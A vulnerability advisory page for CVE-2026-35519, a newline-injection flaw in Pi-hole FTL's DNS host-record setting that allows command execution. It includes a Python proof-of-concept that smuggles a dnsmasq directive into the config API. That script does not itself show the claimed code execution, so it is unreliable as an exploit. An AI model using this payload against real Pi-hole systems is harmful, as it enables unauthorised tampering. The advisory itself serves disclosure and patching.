Security Vulnerability Report
中文
CVE-2026-35519 CVSS 8.8 HIGH

CVE-2026-35519

Published: 2026-04-07 16:16:28
Last Modified: 2026-04-28 20:31:48
Source: [email protected]

Description

FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. From 6.0 to before 6.6, the Pi-hole FTL engine contains a Remote Code Execution (RCE) vulnerability in the DNS host record configuration parameter (dns.hostRecord). This vulnerability allows an authenticated attacker to inject arbitrary dnsmasq configuration directives through newline characters, ultimately achieving command execution on the underlying system. This vulnerability is fixed in 6.6.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:pi-hole:ftldns:*:*:*:*:*:*:*:* - VULNERABLE
Pi-hole FTL 6.0
Pi-hole FTL 6.1
Pi-hole FTL 6.2
Pi-hole FTL 6.3
Pi-hole FTL 6.4
Pi-hole FTL 6.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 import requests # Target configuration target_url = "http://<pi-hole-ip>/api/config" api_token = "<valid-api-token>" # Malicious payload injecting a newline and a dnsmasq directive # This attempts to add a dhcp-option which can lead to command execution in certain contexts payload = "example.com 1.2.3.4\ndhcp-option=6,8.8.8.8" headers = { "Authorization": f"Bearer {api_token}", "Content-Type": "application/json" } data = { "config": { "dns.hostRecord": payload } } try: response = requests.post(target_url, json=data, headers=headers) if response.status_code == 200: print("[+] Payload injected successfully. Configuration updated.") else: print(f"[-] Failed to inject payload. Status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35519", "sourceIdentifier": "[email protected]", "published": "2026-04-07T16:16:28.397", "lastModified": "2026-04-28T20:31:48.363", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. From 6.0 to before 6.6, the Pi-hole FTL engine contains a Remote Code Execution (RCE) vulnerability in the DNS host record configuration parameter (dns.hostRecord). This vulnerability allows an authenticated attacker to inject arbitrary dnsmasq configuration directives through newline characters, ultimately achieving command execution on the underlying system. This vulnerability is fixed in 6.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}, {"lang": "en", "value": "CWE-93"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pi-hole:ftldns:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndIncluding": "6.5", "matchCriteriaId": "8C927FF0-74A4-4F13-95A8-E80C5E80F607"}]}]}], "references": [{"url": "https://github.com/pi-hole/FTL/security/advisories/GHSA-wxhv-w77q-6qwp", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/pi-hole/FTL/security/advisories/GHSA-wxhv-w77q-6qwp", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.